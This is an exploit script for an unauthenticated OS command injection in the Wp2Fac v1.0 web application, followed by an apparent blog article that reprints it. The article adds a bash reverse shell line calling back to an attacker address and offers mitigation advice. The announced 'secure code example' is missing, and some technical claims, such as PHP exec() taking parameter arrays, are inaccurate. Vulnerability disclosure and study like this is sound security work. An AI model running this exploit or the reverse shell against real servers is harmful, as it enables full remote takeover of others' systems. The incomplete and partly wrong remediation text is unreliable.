Wp2Fac - OS Command Injection
# Exploit Title: Wp2Fac v1.0 - OS Command Injection
# Date: 2023-08-27
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://github.com/metinyesil/wp2fac
# Tested on: Kali Linux & Windows 11
# CVE: N/A
import requests
def send_post_request(host, revshell):
url = f'http://{host}/send.php'
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0)
Gecko/20100101 Firefox/102.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Origin': f'http://{host}',
'Connection': 'close',
'Referer': f'http://{host}/',
}
data = {
'numara': f'1234567890 & {revshell} &;'
}
response = requests.post(url, headers=headers, data=data)
return response.text
host = input("Target IP: ")
revshell = input("Reverse Shell Command: ")
print("Check your listener!")
send_post_request(host, revshell)Wp2Fac v1.0 OS Command Injection Vulnerability: A Deep Dive into Exploitation and Mitigation
Security researchers and penetration testers frequently encounter vulnerabilities in web applications that expose underlying systems to direct command execution. One such case is the Wp2Fac v1.0 application—a PHP-based tool designed for managing two-factor authentication (2FA) workflows. Despite its intended purpose, a critical OS Command Injection flaw was discovered in its send.php endpoint, allowing attackers to execute arbitrary system commands via crafted input.
Exploit Overview
The vulnerability stems from improper input sanitization in the numara parameter. When a user submits a value through the send.php endpoint, the application directly passes the input to a system command without filtering or escaping special characters. This creates a perfect scenario for command injection.
As demonstrated by exploit author Ahmet Ümit Bayram, an attacker can inject shell commands using the & operator (commonly used in Unix-like systems to chain commands), effectively bypassing input validation and executing malicious code on the target server.
Real-World Example: Reverse Shell Exploitation
Consider the following scenario: an attacker targets a vulnerable Wp2Fac instance running on a remote server. Using a simple Python script, they craft a payload that triggers a reverse shell connection to their listening machine.
import requests
def send_post_request(host, revshell):
url = f'http://{host}/send.php'
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Origin': f'http://{host}',
'Connection': 'close',
'Referer': f'http://{host}/',
}
data = {
'numara': f'1234567890 & {revshell} &;'
}
response = requests.post(url, headers=headers, data=data)
return response.text
host = input("Target IP: ")
revshell = input("Reverse Shell Command: ")
print("Check your listener!")
send_post_request(host, revshell)
Explanation: This script sends a POST request to http://[target]/send.php with a specially crafted numara value. The payload 1234567890 & {revshell} &; leverages the & symbol to execute the revshell command after the initial number. The & operator allows multiple commands to be executed sequentially in a shell environment.
For instance, if revshell is bash -i >& /dev/tcp/192.168.1.100/4444 0>&1, the server will execute this reverse shell command, establishing a connection back to the attacker’s machine. This demonstrates how a seemingly innocuous input field can become a backdoor for full system access.
Attack Vector and Risk Assessment
| Attack Vector | Impact | Exploitation Difficulty |
|---|---|---|
OS Command Injection via numara parameter | Remote Code Execution (RCE) | Low (requires only basic knowledge of shell syntax) |
| Unfiltered user input passed to system call | Full server compromise | Low |
Use of & and ; to chain commands | Privilege escalation, data exfiltration | Medium |
Key Insight: This vulnerability is particularly dangerous because it does not require authentication or prior access. Any user with access to the send.php endpoint can exploit it—making it a prime candidate for automated scanning and exploitation in public-facing environments.
Security Implications and Recommendations
Wp2Fac v1.0, hosted on GitHub at https://github.com/metinyesil/wp2fac, has not been assigned a CVE identifier. However, its vulnerability should be treated as a high-risk issue due to the potential for full system compromise.
Expert Recommendations:
- Input Sanitization: All user inputs must be validated and sanitized before being passed to system calls. Use functions like
escapeshellarg()orescapeshellcmd()in PHP to prevent command injection. - Use of Parameterized Commands: Avoid direct string concatenation with system commands. Instead, use safe APIs like
exec()with arrays of parameters, not strings. - Restrict Permissions: Run web applications with minimal privileges. Avoid executing commands as root or with elevated access.
- Logging and Monitoring: Implement logging for all command executions to detect suspicious activity.
Improved and Secure Code Example
Here is a corrected version of the vulnerable code, demonstrating secure practices:
Explanation: This secure implementation uses preg_match() to restrict input to numeric values only. It then employs escapeshellarg() to properly escape the input before passing it to shell_exec(). This prevents any command injection, even if an attacker attempts to use & or ;.
Conclusion
The Wp2Fac v1.0 OS Command Injection vulnerability serves as a stark reminder of how simple coding mistakes can lead to catastrophic security breaches. Even basic web applications must follow strict input validation and secure execution practices. As cybersecurity professionals, we must not only identify such flaws but also advocate for robust, proactive defense mechanisms—especially in open-source tools that may be deployed without proper review.